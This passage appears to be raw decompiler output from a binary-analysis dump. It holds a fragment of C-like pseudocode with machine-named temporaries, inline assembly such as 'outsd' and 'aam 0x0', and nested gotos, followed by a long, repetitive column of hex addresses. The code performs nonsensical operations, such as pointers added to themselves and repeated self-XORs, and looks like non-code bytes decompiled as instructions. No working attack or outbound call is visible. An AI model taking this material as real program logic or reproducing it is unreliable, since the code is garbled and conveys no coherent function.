                                  																																_t515 = _t435 +  *_t435 +  *((intOrPtr*)(_t435 +  *_t435)) -  *(_t435 +  *_t435 +  *((intOrPtr*)(_t435 +  *_t435)));
                                  																																 *_t547 =  *_t547 + _t592;
                                  																																 *(_t515 + _t515) =  *(_t515 + _t515) ^ _t515;
                                  																																_t423 = _t619;
                                  																																_t619 = _t515;
                                  																																 *_t423 =  *_t423 + _t423;
                                  																																_t133 = _t569 + 0x2110000;
                                  																																 *_t133 =  *((intOrPtr*)(_t569 + 0x2110000)) + _t547;
                                  																															} while ( *_t133 != 0);
                                  																															 *_t423 =  *_t423 + _t423;
                                  																															_t593 = _t592 +  *_t603;
                                  																															_t439 = _t423 + 0x2c -  *_t593;
                                  																															 *((intOrPtr*)(_t547 + _t439)) =  *((intOrPtr*)(_t547 + _t439)) - _t439;
                                  																															goto L97;
                                  																														}
                                  																													}
                                  																													 *_t353 =  *_t353 + _t353;
                                  																													 *((intOrPtr*)(_t612 + 0x2110000)) =  *((intOrPtr*)(_t612 + 0x2110000)) + _t590;
                                  																													 *((intOrPtr*)(_t534 + _t353)) =  *((intOrPtr*)(_t534 + _t353)) - _t353;
                                  																													 *_t605 =  *_t605 + _t353;
                                  																													asm("outsd");
                                  																													 *0x750a0002 = _t353;
                                  																													asm("aam 0x0");
                                  																													 *_t590 =  *_t590 + _t353;
                                  																													_push(es);
                                  																													asm("outsd");
                                  																													_push(es);
                                  																													asm("outsd");
                                  																													_t597 = _t597;
                                  																													_t369 = (_t353 |  *_t605) - 0x14 + 0x74c51200 -  *((intOrPtr*)((_t353 |  *_t605) - 0x14 + 0x74c51200));
                                  																													 *_t534 =  *_t534 + _t590;
                                  																													 *_t563 =  *_t563 ^ _t369;
                                  																													 *_t590 =  *_t590 + _t563;
                                  																													goto L85;
                                  																												}
                                  																											}
                                  																											goto L69;
                                  																										}
                                  																									}
                                  																									goto L65;
                                  																								}
                                  																							}
                                  																							goto L61;
                                  																						}
                                  																					}
                                  																					goto L57;
                                  																				}
                                  																			}
                                  																			goto L53;
                                  																		}
                                  																	}
                                  																	goto L47;
                                  																	L32:
                                  																	 *_t533 =  *_t533 ^ _t322;
                                  																	 *_t563 =  *_t563 + _t563;
                                  																	 *_t322 =  *_t322 + _t322;
                                  																	_t73 = _t563 + 0x2110000;
                                  																	 *_t73 =  *((intOrPtr*)(_t563 + 0x2110000)) + _t590;
                                  																	if( *_t73 != 0) {
                                  																		continue;
                                  																	} else {
                                  																		 *_t322 =  *_t322 + _t322;
                                  																		_push(es);
                                  																		_t324 = _t322 + 0x0000000a |  *_t597;
                                  																		goto L34;
                                  																	}
                                  																	goto L51;
                                  																}
                                  															}
                                  														}
                                  														goto L16;
                                  													}
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L2;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}
























































































































































































                                  0x009dd014
                                  0x009dd014
                                  0x009dd014
                                  0x009dd014
                                  0x009dd016
                                  0x009dd01b
                                  0x009dd021
                                  0x009dd025
                                  0x009dd027
                                  0x009dd029
                                  0x009dd02b
                                  0x009dd02e
                                  0x009dd030
                                  0x009dd031
                                  0x009dd031
                                  0x009dd031
                                  0x009dd033
                                  0x009dd035
                                  0x009dd03b
                                  0x009dd03c
                                  0x009dd041
                                  0x009dd043
                                  0x009dd045
                                  0x009dd047
                                  0x009dd04a
                                  0x009dd04c
                                  0x009dd04e
                                  0x009dd050
                                  0x009dd052
                                  0x009dd054
                                  0x009dd056
                                  0x009dd057
                                  0x009dd059
                                  0x009dd05b
                                  0x009dd064
                                  0x009dd066
                                  0x009dd068
                                  0x009dd06b
                                  0x009dd06d
                                  0x009dd071
                                  0x009dd073
                                  0x009dd079
                                  0x009dd07d
                                  0x009dd07f
                                  0x009dd085
                                  0x009dd087
                                  0x009dd089
                                  0x009dd08b
                                  0x009dd08d
                                  0x009dd08f
                                  0x009dd091
                                  0x009dd097
                                  0x009dd099
                                  0x009dd09b
                                  0x009dd09d
                                  0x009dd0a3
                                  0x009dd0a5
                                  0x009dd0a7
                                  0x009dd0a8
                                  0x009dd0a8
                                  0x009dd0a8
                                  0x009dd0aa
                                  0x00000000
                                  0x00000000
                                  0x009dd0ac
                                  0x009dd0b0
                                  0x009dd0b1
                                  0x009dd0b6
                                  0x009dd0b7
                                  0x009dd0bb
                                  0x009dd0be
                                  0x009dd0be
                                  0x009dd0c0
                                  0x009dd0c2
                                  0x009dd0cb
                                  0x009dd0cd
                                  0x009dd0cf
                                  0x009dd0d1
                                  0x009dd0d4
                                  0x009dd0d4
                                  0x009dd0d4
                                  0x009dd0d8
                                  0x009dd0da
                                  0x009dd0dc
                                  0x009dd0de
                                  0x009dd0e4
                                  0x009dd0e6
                                  0x009dd0e8
                                  0x009dd0eb
                                  0x009dd0f1
                                  0x009dd0f2
                                  0x009dd0f2
                                  0x009dd0f3
                                  0x009dd0f5
                                  0x009dd0f7
                                  0x009dd0fd
                                  0x009dd0ff
                                  0x009dd102
                                  0x009dd109
                                  0x009dd10a
                                  0x009dd10c
                                  0x009dd10e
                                  0x009dd10f
                                  0x009dd10f
                                  0x009dd112
                                  0x009dd114
                                  0x009dd115
                                  0x009dd116
                                  0x009dd118
                                  0x009dd11b
                                  0x009dd11d
                                  0x009dd11f
                                  0x009dd120
                                  0x009dd122
                                  0x009dd124
                                  0x00000000
                                  0x00000000
                                  0x009dd126
                                  0x009dd12a
                                  0x009dd12b
                                  0x009dd12c
                                  0x009dd12e
                                  0x009dd130
                                  0x009dd131
                                  0x009dd133
                                  0x009dd139
                                  0x009dd0be
                                  0x009dd0c0
                                  0x009dd0c2
                                  0x009dd0cb
                                  0x009dd0cd
                                  0x009dd0cf
                                  0x009dd0d1
                                  0x009dd0d4
                                  0x009dd0d4
                                  0x009dd0d8
                                  0x009dd0da
                                  0x009dd0dc
                                  0x009dd0de
                                  0x009dd0e4
                                  0x009dd0e6
                                  0x009dd0e8
                                  0x009dd0eb
                                  0x009dd0f1
                                  0x009dd0f2
                                  0x009dd0f2
                                  0x009dd0f3
                                  0x009dd0f5
                                  0x009dd0f7
                                  0x009dd0fd
                                  0x009dd0ff
                                  0x009dd102
                                  0x009dd109
                                  0x009dd10a
                                  0x009dd10c
                                  0x009dd10e
                                  0x00000000
                                  0x009dd10e
                                  0x009dd13b
                                  0x009dd13f
                                  0x009dd140
                                  0x009dd141
                                  0x009dd143
                                  0x009dd145
                                  0x009dd146
                                  0x009dd148
                                  0x009dd14e
                                  0x00000000
                                  0x00000000
                                  0x009dd150
                                  0x009dd154
                                  0x009dd155
                                  0x009dd156
                                  0x009dd158
                                  0x009dd15a
                                  0x009dd15b
                                  0x009dd15d
                                  0x009dd160
                                  0x009dd162
                                  0x009dd163
                                  0x009dd163
                                  0x009dd166
                                  0x009dd168
                                  0x009dd16a
                                  0x009dd170
                                  0x009dd174
                                  0x009dd176
                                  0x009dd178
                                  0x009dd17a
                                  0x009dd17c
                                  0x009dd17c
                                  0x009dd17c
                                  0x009dd17f
                                  0x009dd181
                                  0x009dd183
                                  0x009dd185
                                  0x009dd187
                                  0x00000000
                                  0x00000000
                                  0x009dd189
                                  0x009dd18d
                                  0x009dd18e
                                  0x009dd193
                                  0x009dd193
                                  0x009dd196
                                  0x009dd19a
                                  0x009dd1a0
                                  0x009dd1a2
                                  0x009dd1a4
                                  0x009dd1a6
                                  0x009dd1a8
                                  0x009dd1aa
                                  0x009dd1ac
                                  0x009dd1ae
                                  0x009dd1b0
                                  0x009dd1b2
                                  0x009dd1b5
                                  0x009dd1b7
                                  0x009dd1b9
                                  0x009dd1bb
                                  0x009dd1c1
                                  0x009dd1c7
                                  0x009dd1c9
                                  0x009dd1cb
                                  0x009dd1cd
                                  0x009dd1d1
                                  0x009dd1d3
                                  0x009dd1d5
                                  0x009dd1dd
                                  0x009dd1e3
                                  0x009dd1e5
                                  0x009dd1e7
                                  0x009dd1e9
                                  0x009dd1ed
                                  0x009dd1ef
                                  0x009dd1f1
                                  0x009dd1f3
                                  0x00000000
                                  0x00000000
                                  0x009dd1f5
                                  0x009dd1f6
                                  0x00000000
                                  0x00000000
                                  0x009dd200
                                  0x009dd202
                                  0x009dd204
                                  0x009dd209
                                  0x009dd20b
                                  0x009dd20d
                                  0x009dd20f
                                  0x009dd215
                                  0x009dd217
                                  0x009dd220
                                  0x009dd229
                                  0x009dd232
                                  0x009dd242
                                  0x009dd24b
                                  0x009dd24d
                                  0x009dd251
                                  0x009dd251
                                  0x009dd251
                                  0x009dd254
                                  0x009dd257
                                  0x009dd258
                                  0x009dd258
                                  0x009dd260
                                  0x009dd262
                                  0x009dd264
                                  0x009dd264
                                  0x009dd264
                                  0x009dd265
                                  0x009dd267
                                  0x009dd26d
                                  0x009dd26e
                                  0x009dd272
                                  0x009dd273
                                  0x009dd277
                                  0x009dd278
                                  0x009dd27a
                                  0x009dd27d
                                  0x009dd27f
                                  0x009dd281
                                  0x009dd289
                                  0x009dd28b
                                  0x009dd28d
                                  0x009dd28f
                                  0x009dd291
                                  0x009dd293
                                  0x009dd295
                                  0x009dd296
                                  0x009dd298
                                  0x009dd299
                                  0x009dd29b
                                  0x009dd29d
                                  0x009dd29f
                                  0x009dd2a2
                                  0x009dd2a4
                                  0x009dd2a6
                                  0x009dd2a8
                                  0x009dd2a9
                                  0x009dd2a9
                                  0x009dd2a9
                                  0x009dd2ab
                                  0x009dd2ac
                                  0x009dd2ae
                                  0x009dd2b0
                                  0x00000000
                                  0x00000000
                                  0x009dd2b2
                                  0x009dd2b4
                                  0x009dd2b6
                                  0x009dd258
                                  0x009dd260
                                  0x009dd262
                                  0x009dd264
                                  0x009dd264
                                  0x009dd265
                                  0x009dd267
                                  0x009dd26d
                                  0x009dd26e
                                  0x009dd272
                                  0x009dd273
                                  0x009dd277
                                  0x009dd278
                                  0x009dd27a
                                  0x009dd27d
                                  0x009dd27f
                                  0x009dd281
                                  0x009dd289
                                  0x009dd28b
                                  0x009dd28d
                                  0x009dd28f
                                  0x009dd291
                                  0x009dd293
                                  0x009dd295
                                  0x009dd296
                                  0x009dd298
                                  0x009dd299
                                  0x009dd29b
                                  0x009dd29d
                                  0x009dd29f
                                  0x009dd2a2
                                  0x009dd2a4
                                  0x009dd2a6
                                  0x009dd2a8
                                  0x00000000
                                  0x009dd2a8
                                  0x009dd2b8
                                  0x009dd2ba
                                  0x009dd2bd
                                  0x009dd2bf
                                  0x009dd2c1
                                  0x00000000
                                  0x00000000
                                  0x009dd2c3
                                  0x009dd2c5
                                  0x009dd2c8
                                  0x009dd2ca
                                  0x009dd2cc
                                  0x009dd2ce
                                  0x009dd2d4
                                  0x009dd2d6
                                  0x009dd2d8
                                  0x009dd2da
                                  0x009dd2e0
                                  0x009dd2e1
                                  0x009dd2e3
                                  0x009dd2e6
                                  0x009dd2ed
                                  0x009dd2f0
                                  0x009dd2f2
                                  0x009dd2f4
                                  0x009dd2f6
                                  0x009dd2fa
                                  0x009dd2fc
                                  0x009dd2ff
                                  0x009dd301
                                  0x009dd303
                                  0x009dd304
                                  0x009dd304
                                  0x009dd304
                                  0x009dd306
                                  0x009dd308
                                  0x009dd30a
                                  0x009dd30c
                                  0x00000000
                                  0x00000000
                                  0x009dd30e
                                  0x009dd30e
                                  0x009dd310
                                  0x009dd313
                                  0x00000000
                                  0x009dd315
                                  0x009dd315
                                  0x009dd317
                                  0x009dd319
                                  0x009dd31a
                                  0x009dd31a
                                  0x009dd31d
                                  0x009dd321
                                  0x009dd324
                                  0x009dd326
                                  0x009dd328
                                  0x009dd32a
                                  0x009dd32c
                                  0x009dd32e
                                  0x009dd332
                                  0x009dd334
                                  0x009dd337
                                  0x009dd339
                                  0x009dd33b
                                  0x009dd33c
                                  0x009dd33c
                                  0x009dd33e
                                  0x009dd340
                                  0x009dd342
                                  0x009dd344
                                  0x009dd399
                                  0x009dd399
                                  0x009dd39b
                                  0x009dd39d
                                  0x009dd39f
                                  0x009dd39f
                                  0x009dd3a5
                                  0x00000000
                                  0x009dd3a7
                                  0x009dd3a7
                                  0x009dd3a9
                                  0x009dd3ab
                                  0x009dd3ab
                                  0x009dd3ac
                                  0x009dd3ad
                                  0x009dd3ad
                                  0x009dd3ae
                                  0x009dd3b0
                                  0x009dd3b2
                                  0x009dd3b4
                                  0x009dd3b6
                                  0x009dd3b8
                                  0x009dd3bb
                                  0x00000000
                                  0x009dd3bd
                                  0x009dd3bd
                                  0x009dd3bf
                                  0x009dd3c1
                                  0x009dd3c2
                                  0x009dd3c3
                                  0x009dd3c3
                                  0x009dd3c4
                                  0x009dd3c6
                                  0x009dd3c9
                                  0x009dd3ca
                                  0x009dd3cc
                                  0x009dd3ce
                                  0x009dd3d0
                                  0x009dd3d2
                                  0x009dd3d3
                                  0x009dd3d3
                                  0x009dd3d5
                                  0x009dd3d7
                                  0x009dd3d7
                                  0x009dd3dd
                                  0x009dd375
                                  0x009dd375
                                  0x009dd376
                                  0x009dd378
                                  0x009dd37a
                                  0x009dd37c
                                  0x00000000
                                  0x009dd37e
                                  0x009dd37e
                                  0x009dd380
                                  0x009dd383
                                  0x00000000
                                  0x009dd385
                                  0x009dd385
                                  0x009dd387
                                  0x009dd389
                                  0x009dd38a
                                  0x00000000
                                  0x009dd38a
                                  0x009dd383
                                  0x009dd3df
                                  0x009dd3df
                                  0x009dd3e1
                                  0x009dd3e3
                                  0x009dd3e3
                                  0x009dd3e4
                                  0x009dd3e6
                                  0x009dd3e8
                                  0x009dd3ea
                                  0x009dd3ec
                                  0x00000000
                                  0x009dd3ee
                                  0x009dd3ee
                                  0x009dd3f0
                                  0x009dd3f0
                                  0x009dd3f3
                                  0x009dd38b
                                  0x009dd38b
                                  0x009dd38c
                                  0x009dd38e
                                  0x009dd391
                                  0x009dd392
                                  0x009dd394
                                  0x009dd396
                                  0x009dd398
                                  0x00000000
                                  0x009dd3f5
                                  0x009dd3f5
                                  0x009dd3f7
                                  0x009dd3f9
                                  0x009dd3fa
                                  0x009dd3fc
                                  0x009dd3fc
                                  0x009dd3fe
                                  0x009dd401
                                  0x009dd402
                                  0x009dd404
                                  0x009dd406
                                  0x009dd408
                                  0x009dd40a
                                  0x009dd40a
                                  0x009dd3f3
                                  0x009dd3ec
                                  0x009dd3dd
                                  0x009dd3bb
                                  0x009dd3b4
                                  0x009dd346
                                  0x009dd346
                                  0x009dd348
                                  0x009dd34b
                                  0x009dd2e3
                                  0x009dd2e6
                                  0x009dd2ed
                                  0x009dd2f0
                                  0x009dd2f2
                                  0x009dd2f4
                                  0x009dd2f6
                                  0x009dd2fa
                                  0x009dd2fc
                                  0x009dd2ff
                                  0x009dd301
                                  0x009dd303
                                  0x009dd304
                                  0x009dd304
                                  0x009dd306
                                  0x009dd308
                                  0x009dd30a
                                  0x009dd30c
                                  0x00000000
                                  0x00000000
                                  0x009dd34d
                                  0x009dd34d
                                  0x009dd34f
                                  0x009dd351
                                  0x009dd352
                                  0x009dd352
                                  0x009dd355
                                  0x009dd359
                                  0x009dd35a
                                  0x009dd35c
                                  0x009dd35e
                                  0x009dd360
                                  0x00000000
                                  0x009dd360
                                  0x009dd34b
                                  0x009dd344
                                  0x009dd40b
                                  0x009dd40b
                                  0x009dd40d
                                  0x009dd40f
                                  0x009dd40f
                                  0x009dd415
                                  0x00000000
                                  0x00000000
                                  0x009dd417
                                  0x009dd419
                                  0x009dd41b
                                  0x009dd41b
                                  0x009dd41b
                                  0x009dd41c
                                  0x009dd41e
                                  0x009dd420
                                  0x009dd422
                                  0x009dd424
                                  0x00000000
                                  0x00000000
                                  0x009dd426
                                  0x009dd428
                                  0x009dd428
                                  0x009dd42b
                                  0x00000000
                                  0x00000000
                                  0x009dd42d
                                  0x009dd42f
                                  0x009dd431
                                  0x009dd432
                                  0x009dd434
                                  0x009dd434
                                  0x009dd436
                                  0x009dd439
                                  0x009dd43c
                                  0x009dd43e
                                  0x009dd440
                                  0x009dd442
                                  0x009dd444
                                  0x009dd446
                                  0x009dd448
                                  0x009dd44a
                                  0x009dd44c
                                  0x009dd44f
                                  0x009dd451
                                  0x009dd453
                                  0x009dd453
                                  0x009dd453
                                  0x009dd454
                                  0x009dd456
                                  0x009dd458
                                  0x009dd45a
                                  0x009dd45c
                                  0x00000000
                                  0x00000000
                                  0x009dd45e
                                  0x009dd460
                                  0x009dd460
                                  0x009dd463
                                  0x00000000
                                  0x00000000
                                  0x009dd465
                                  0x009dd467
                                  0x009dd469
                                  0x009dd46a
                                  0x009dd46d
                                  0x009dd46d
                                  0x009dd471
                                  0x009dd474
                                  0x009dd476
                                  0x009dd478
                                  0x009dd47a
                                  0x009dd47c
                                  0x009dd47e
                                  0x009dd480
                                  0x009dd482
                                  0x009dd484
                                  0x009dd487
                                  0x009dd489
                                  0x009dd48b
                                  0x009dd48b
                                  0x009dd48b
                                  0x009dd48c
                                  0x009dd48e
                                  0x009dd490
                                  0x009dd492
                                  0x009dd494
                                  0x00000000
                                  0x00000000
                                  0x009dd496
                                  0x009dd498
                                  0x009dd498
                                  0x009dd49b
                                  0x009dd434
                                  0x009dd436
                                  0x009dd439
                                  0x009dd43c
                                  0x009dd43e
                                  0x009dd440
                                  0x009dd442
                                  0x009dd444
                                  0x009dd446
                                  0x009dd448
                                  0x009dd44a
                                  0x009dd44c
                                  0x009dd44f
                                  0x009dd451
                                  0x00000000
                                  0x009dd451
                                  0x009dd49d
                                  0x009dd49f
                                  0x009dd4a1
                                  0x009dd4a2
                                  0x009dd4a5
                                  0x009dd4a5
                                  0x009dd4a9
                                  0x009dd4ac
                                  0x009dd4ae
                                  0x009dd4b0
                                  0x009dd4b2
                                  0x009dd4b4
                                  0x009dd4b6
                                  0x009dd4b8
                                  0x009dd4ba
                                  0x009dd4bc
                                  0x009dd4bf
                                  0x009dd4c1
                                  0x009dd4c3
                                  0x009dd4c3
                                  0x009dd4c3
                                  0x009dd4c4
                                  0x009dd4c6
                                  0x009dd4c8
                                  0x009dd4ca
                                  0x009dd4cc
                                  0x00000000
                                  0x00000000
                                  0x009dd4ce
                                  0x009dd4d0
                                  0x009dd4d0
                                  0x009dd4d3
                                  0x009dd46d
                                  0x009dd471
                                  0x009dd474
                                  0x009dd476
                                  0x009dd478
                                  0x009dd47a
                                  0x009dd47c
                                  0x009dd47e
                                  0x009dd480
                                  0x009dd482
                                  0x009dd484
                                  0x009dd487
                                  0x009dd489
                                  0x00000000
                                  0x009dd489
                                  0x009dd4d5
                                  0x009dd4d7
                                  0x009dd4d9
                                  0x009dd4da
                                  0x009dd4dd
                                  0x009dd4de
                                  0x009dd4de
                                  0x009dd4e1
                                  0x009dd4e4
                                  0x009dd4e6
                                  0x009dd4e8
                                  0x009dd4ea
                                  0x009dd4ec
                                  0x009dd4ee
                                  0x009dd4f0
                                  0x009dd4f2
                                  0x009dd4f4
                                  0x009dd4f7
                                  0x009dd4f9
                                  0x009dd4fb
                                  0x009dd4fc
                                  0x009dd4fc
                                  0x009dd4fc
                                  0x009dd4fe
                                  0x009dd500
                                  0x009dd502
                                  0x009dd504
                                  0x00000000
                                  0x00000000
                                  0x009dd506
                                  0x009dd508
                                  0x009dd508
                                  0x009dd50b
                                  0x009dd4a5
                                  0x009dd4a9
                                  0x009dd4ac
                                  0x009dd4ae
                                  0x009dd4b0
                                  0x009dd4b2
                                  0x009dd4b4
                                  0x009dd4b6
                                  0x009dd4b8
                                  0x009dd4ba
                                  0x009dd4bc
                                  0x009dd4bf
                                  0x009dd4c1
                                  0x00000000
                                  0x009dd4c1
                                  0x009dd50d
                                  0x009dd50f
                                  0x009dd511
                                  0x009dd512
                                  0x009dd515
                                  0x009dd516
                                  0x009dd516
                                  0x009dd519
                                  0x009dd51c
                                  0x009dd51e
                                  0x009dd520
                                  0x009dd522
                                  0x009dd524
                                  0x009dd526
                                  0x009dd52a
                                  0x009dd52c
                                  0x009dd52f
                                  0x009dd531
                                  0x009dd533
                                  0x009dd534
                                  0x009dd534
                                  0x009dd534
                                  0x009dd536
                                  0x009dd538
                                  0x009dd53a
                                  0x009dd53c
                                  0x00000000
                                  0x00000000
                                  0x009dd53e
                                  0x009dd540
                                  0x009dd540
                                  0x009dd543
                                  0x009dd4de
                                  0x009dd4e1
                                  0x009dd4e4
                                  0x009dd4e6
                                  0x009dd4e8
                                  0x009dd4ea
                                  0x009dd4ec
                                  0x009dd4ee
                                  0x009dd4f0
                                  0x009dd4f2
                                  0x009dd4f4
                                  0x009dd4f7
                                  0x009dd4f9
                                  0x009dd4fb
                                  0x00000000
                                  0x009dd4fb
                                  0x009dd545
                                  0x009dd547
                                  0x009dd549
                                  0x009dd54a
                                  0x009dd54d
                                  0x009dd54f
                                  0x009dd54f
                                  0x009dd551
                                  0x009dd554
                                  0x009dd556
                                  0x009dd558
                                  0x009dd55a
                                  0x009dd55c
                                  0x009dd55e
                                  0x009dd562
                                  0x009dd564
                                  0x009dd567
                                  0x009dd56b
                                  0x009dd56c
                                  0x009dd56e
                                  0x009dd570
                                  0x009dd572
                                  0x009dd574
                                  0x00000000
                                  0x00000000
                                  0x009dd576
                                  0x009dd578
                                  0x009dd578
                                  0x009dd57b
                                  0x009dd516
                                  0x009dd519
                                  0x009dd51c
                                  0x009dd51e
                                  0x009dd520
                                  0x009dd522
                                  0x009dd524
                                  0x009dd526
                                  0x009dd52a
                                  0x009dd52c
                                  0x009dd52f
                                  0x009dd531
                                  0x009dd533
                                  0x00000000
                                  0x009dd533
                                  0x009dd57d
                                  0x009dd57f
                                  0x009dd581
                                  0x009dd582
                                  0x009dd585
                                  0x009dd587
                                  0x009dd589
                                  0x009dd58c
                                  0x009dd58e
                                  0x009dd590
                                  0x009dd592
                                  0x009dd594
                                  0x009dd596
                                  0x009dd59a
                                  0x009dd59c
                                  0x009dd59f
                                  0x009dd5a3
                                  0x009dd5a4
                                  0x009dd5a6
                                  0x009dd5a8
                                  0x009dd5aa
                                  0x009dd5ac
                                  0x00000000
                                  0x00000000
                                  0x009dd5ae
                                  0x009dd5b0
                                  0x009dd5b3
                                  0x00000000
                                  0x009dd5b5
                                  0x009dd5b5
                                  0x009dd5b9
                                  0x009dd5ba
                                  0x009dd5bd
                                  0x009dd5c1
                                  0x009dd5c4
                                  0x009dd5c6
                                  0x009dd5c8
                                  0x009dd5ca
                                  0x009dd5cc
                                  0x009dd5ce
                                  0x009dd5d2
                                  0x009dd5d4
                                  0x009dd5d7
                                  0x009dd5db
                                  0x009dd5dc
                                  0x009dd5de
                                  0x009dd5e0
                                  0x009dd5e2
                                  0x009dd5e4
                                  0x009dd5e6
                                  0x009dd5e8
                                  0x009dd5eb
                                  0x00000000
                                  0x009dd5ed
                                  0x009dd5ed
                                  0x009dd5f1
                                  0x009dd5f2
                                  0x009dd5f5
                                  0x009dd5f9
                                  0x009dd5fa
                                  0x009dd5fc
                                  0x009dd5fe
                                  0x009dd600
                                  0x009dd602
                                  0x009dd604
                                  0x00000000
                                  0x009dd604
                                  0x009dd5eb
                                  0x009dd5e4
                                  0x009dd63d
                                  0x009dd63d
                                  0x009dd63f
                                  0x009dd645
                                  0x009dd648
                                  0x009dd64a
                                  0x009dd64b
                                  0x009dd650
                                  0x009dd652
                                  0x009dd658
                                  0x009dd659
                                  0x009dd65a
                                  0x009dd660
                                  0x009dd661
                                  0x009dd662
                                  0x009dd66d
                                  0x009dd66f
                                  0x009dd671
                                  0x009dd673
                                  0x009dd679
                                  0x009dd67b
                                  0x009dd67d
                                  0x009dd680
                                  0x009dd682
                                  0x009dd683
                                  0x009dd688
                                  0x009dd68a
                                  0x009dd691
                                  0x009dd692
                                  0x009dd698
                                  0x009dd69a
                                  0x009dd69c
                                  0x009dd69e
                                  0x009dd6a0
                                  0x009dd6a2
                                  0x009dd6a6
                                  0x009dd6aa
                                  0x009dd6ac
                                  0x009dd6ae
                                  0x009dd6af
                                  0x009dd6b4
                                  0x009dd6b6
                                  0x009dd6b8
                                  0x009dd6bf
                                  0x009dd6c4
                                  0x009dd6ca
                                  0x009dd6cc
                                  0x009dd6ce
                                  0x009dd6d1
                                  0x009dd6d3
                                  0x009dd6d5
                                  0x009dd6d7
                                  0x009dd6d9
                                  0x009dd6db
                                  0x009dd6e1
                                  0x009dd6e4
                                  0x009dd6e6
                                  0x009dd6ed
                                  0x009dd6f1
                                  0x009dd6f7
                                  0x009dd700
                                  0x009dd704
                                  0x009dd707
                                  0x009dd70b
                                  0x009dd712
                                  0x009dd716
                                  0x009dd71c
                                  0x009dd71f
                                  0x009dd721
                                  0x009dd723
                                  0x009dd727
                                  0x009dd72a
                                  0x009dd72c
                                  0x009dd72f
                                  0x009dd730
                                  0x009dd732
                                  0x009dd734
                                  0x009dd734
                                  0x009dd736
                                  0x009dd738
                                  0x009dd73c
                                  0x009dd743
                                  0x009dd745
                                  0x009dd746
                                  0x009dd74c
                                  0x009dd74f
                                  0x009dd750
                                  0x009dd753
                                  0x009dd75b
                                  0x009dd760
                                  0x009dd762
                                  0x009dd764
                                  0x009dd766
                                  0x009dd76b
                                  0x009dd76c
                                  0x009dd76f
                                  0x009dd776
                                  0x009dd778
                                  0x009dd77a
                                  0x009dd77b
                                  0x009dd77d
                                  0x009dd77f
                                  0x009dd781
                                  0x009dd781
                                  0x009dd782
                                  0x009dd783
                                  0x009dd784
                                  0x009dd789
                                  0x009dd78d
                                  0x009dd790
                                  0x009dd793
                                  0x009dd796
                                  0x009dd798
                                  0x009dd79a
                                  0x009dd79c
                                  0x009dd79e
                                  0x009dd79e
                                  0x009dd79f
                                  0x009dd7a1
                                  0x009dd7a3
                                  0x009dd7a6
                                  0x009dd7a7
                                  0x009dd7a9
                                  0x009dd7ab
                                  0x009dd7ab
                                  0x009dd7ad
                                  0x009dd7b5
                                  0x009dd7be
                                  0x009dd7c5
                                  0x009dd7c7
                                  0x009dd7cc
                                  0x009dd7ce
                                  0x009dd7d0
                                  0x009dd7d0
                                  0x009dd7d2
                                  0x009dd7d2
                                  0x009dd7d2
                                  0x009dd7d7
                                  0x009dd7da
                                  0x009dd7dc
                                  0x009dd7dd
                                  0x009dd7df
                                  0x009dd7e1
                                  0x009dd7e3
                                  0x009dd7e4
                                  0x009dd7ea
                                  0x00000000
                                  0x00000000
                                  0x009dd7ec
                                  0x009dd7ee
                                  0x009dd7f0
                                  0x009dd7f2
                                  0x009dd846
                                  0x009dd848
                                  0x009dd84a
                                  0x009dd84c
                                  0x009dd857
                                  0x009dd859
                                  0x009dd85e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x009dd860
                                  0x009dd860
                                  0x009dd865
                                  0x009dd867
                                  0x009dd869
                                  0x009dd869
                                  0x009dd86b
                                  0x009dd86b
                                  0x009dd86b
                                  0x009dd870
                                  0x009dd873
                                  0x009dd875
                                  0x009dd876
                                  0x009dd878
                                  0x009dd87a
                                  0x009dd87c
                                  0x009dd87d
                                  0x009dd883
                                  0x009dd81a
                                  0x009dd81a
                                  0x009dd81c
                                  0x009dd81f
                                  0x009dd820
                                  0x009dd820
                                  0x009dd826
                                  0x009dd827
                                  0x009dd829
                                  0x009dd82a
                                  0x009dd82a
                                  0x009dd82e
                                  0x009dd833
                                  0x009dd834
                                  0x009dd836
                                  0x009dd838
                                  0x009dd839
                                  0x009dd83f
                                  0x009dd840
                                  0x009dd842
                                  0x009dd844
                                  0x00000000
                                  0x009dd844
                                  0x00000000
                                  0x009dd827
                                  0x009dd885
                                  0x009dd887
                                  0x009dd889
                                  0x009dd88b
                                  0x009dd8df
                                  0x009dd8df
                                  0x009dd8e0
                                  0x009dd8e2
                                  0x009dd8e4
                                  0x009dd8e6
                                  0x009dd8e8
                                  0x009dd8ea
                                  0x009dd8ec
                                  0x009dd8f1
                                  0x009dd8f4
                                  0x009dd88d
                                  0x009dd88d
                                  0x009dd88f
                                  0x009dd88f
                                  0x009dd890
                                  0x009dd891
                                  0x009dd894
                                  0x009dd896
                                  0x009dd898
                                  0x009dd899
                                  0x00000000
                                  0x00000000
                                  0x009dd89b
                                  0x009dd89d
                                  0x009dd89f
                                  0x009dd8a1
                                  0x009dd8a3
                                  0x009dd8a9
                                  0x009dd8ab
                                  0x009dd8ad
                                  0x009dd8af
                                  0x009dd8b5
                                  0x009dd8b9
                                  0x009dd8ba
                                  0x009dd8bd
                                  0x009dd8bf
                                  0x009dd8c1
                                  0x009dd8c3
                                  0x009dd8c5
                                  0x009dd8c7
                                  0x009dd8c9
                                  0x009dd8cb
                                  0x009dd8cc
                                  0x009dd8cd
                                  0x009dd8d2
                                  0x009dd8d3
                                  0x009dd8d4
                                  0x00000000
                                  0x009dd8d6
                                  0x009dd8d6
                                  0x009dd8da
                                  0x009dd8db
                                  0x009dd8dd
                                  0x00000000
                                  0x009dd8dd
                                  0x009dd8d4
                                  0x00000000
                                  0x009dd8bf
                                  0x00000000
                                  0x009dd88f
                                  0x009dd8f5
                                  0x009dd8f5
                                  0x009dd8f6
                                  0x009dd8f7
                                  0x009dd8fc
                                  0x009dd8fe
                                  0x009dd900
                                  0x009dd900
                                  0x009dd907
                                  0x009dd914
                                  0x009dd915
                                  0x009dd916
                                  0x009dd91a
                                  0x009dd91a
                                  0x009dd91c
                                  0x009dd91e
                                  0x009dd920
                                  0x009dd922
                                  0x009dd924
                                  0x009dd926
                                  0x009dd928
                                  0x009dd92a
                                  0x009dd92b
                                  0x009dd92b
                                  0x009dd92d
                                  0x009dd92e
                                  0x009dd934
                                  0x009dd936
                                  0x00000000
                                  0x00000000
                                  0x009dd93a
                                  0x009dd93f
                                  0x009dd941
                                  0x009dd944
                                  0x009dd946
                                  0x009dd94c
                                  0x009dd94e
                                  0x00000000
                                  0x00000000
                                  0x009dd952
                                  0x009dd957
                                  0x009dd959
                                  0x009dd95c
                                  0x009dd95e
                                  0x009dd964
